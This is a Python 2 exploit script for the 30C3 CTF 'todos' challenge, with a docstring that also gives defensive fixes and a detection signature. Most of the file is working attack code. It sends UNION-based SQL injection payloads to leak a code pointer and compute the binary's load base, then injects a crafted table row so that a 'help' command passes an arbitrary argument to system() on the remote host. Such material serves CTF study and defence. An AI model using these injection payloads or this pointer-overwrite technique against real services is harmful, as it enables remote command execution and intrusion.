#!/usr/bin/python
"""30C3 CTF "todos" [300] solution script (Python 2 only).

Flow: log in, use a UNION-based SQL injection in the ``search`` command to
leak a code pointer, compute the binary's load base from it, inject a second
crafted row built from that base, then send ``help <cmd>`` so that the
argument given on the command line is handed to ``system`` on the remote
side and the output is echoed back.

Defender's reading of what this script depends on: the service builds SQL
from the raw ``search`` argument (fix: parameterized queries), and it
treats bytes that came back from the database as trusted in-memory
structure holding function pointers (fix: never reconstitute pointers from
untrusted data; keep data and control separate). ``UNION ALL`` /
``information_schema`` / ``0x...`` hex literals inside a ``search`` request
are an easy signature for request logging or a WAF rule.

Python 2 only: ``print`` statements and ``str.encode('hex')`` do not exist
in Python 3. All offsets are hard-coded for the binary/libc served during
the CTF and mean nothing against any other build.
"""
import sys, socket
from struct import pack

# Exactly one argument: the shell command the remote ``system`` call runs.
if len(sys.argv) != 2:
    print "Usage: %s <cmd>" % sys.argv[0]
    sys.exit(-1)

# Byte offsets relative to the leaked .text pointer / computed base.
cmd_help_name = 0x21dc          # presumably the "help" command's name string — TODO confirm
cmd_help_regex = 0x2162         # presumably the "help" command's regex string — TODO confirm
system_libc_delta = 0x152b550   # distance from the binary base down to libc's system()
text_base_delta = 0x19d0        # distance from the leaked pointer back to the binary base

# 30C3 CTF - todos [300]
s = socket.create_connection(('88.198.89.199',1234))   # the CTF box as served in 2013
s.recv(8192)                     # banner / prompt
s.send("login bla bla\n")        # log in; the reply is never checked
s.recv(8192)

# leak pointer
# The tail of the search string is injected verbatim into the service's SQL.
# The first UNION pads the result set with 10 filler rows; the final
# ``select 0x0e000000`` row is presumably what makes the service hand back
# a raw in-memory pointer when that row is shown — TODO confirm.
s.send("search ' AND 1=2 UNION ALL (select table_name from information_schema.tables LIMIT 10) UNION ALL select 0x0e000000 #\n")
s.recv(8192)
s.send("show 11\n")              # row 11 = the injected row after the 10 filler rows
data = s.recv(8192)

# parse offset
# data[4:-1] drops a 4-byte reply prefix and the trailing newline, leaving the
# raw pointer bytes; [::-1] reverses little-endian to big-endian so that
# int(..., 16) reads the hex in natural order.
addr = int(data[4:-1][::-1].encode('hex'), 16)
base = addr - text_base_delta

# convert to hex strings
# Each value becomes an 8-byte little-endian pointer rendered as hex text,
# because the payload below is sent as a MySQL 0x... literal.
cmd = pack("<Q", base + cmd_help_name).encode('hex')
regex = pack("<Q", base + cmd_help_regex).encode('hex')
system = pack("<Q", base - system_libc_delta).encode('hex')

# exploit
# Second injection, same padding trick. The hex literal is laid out as an
# 8-byte field (little-endian 2), 16 bytes of "A" filler, then the three
# pointers; presumably it is parsed server-side as a command-table entry whose
# handler pointer now points at system — TODO confirm the layout against the
# binary.
s.send("search ' AND 1=2 UNION ALL SELECT 0x41 FROM information_schema.tables LIMIT 10 UNION ALL SELECT 0x0200000000000000%s%s%s%s #\n" % ("A"*16, cmd, regex, system))
s.recv(8192)
# "help <cmd>" presumably dispatches through the injected entry, so the
# argument reaches system(); the command's output comes back in the reply.
s.send("help " + sys.argv[1] + "\n")
print s.recv(8192).strip()
# NOTE: missing "()" — this only references the bound method and never closes
# the socket. Harmless here because the interpreter exits right after, but it
# is a bug.
s.close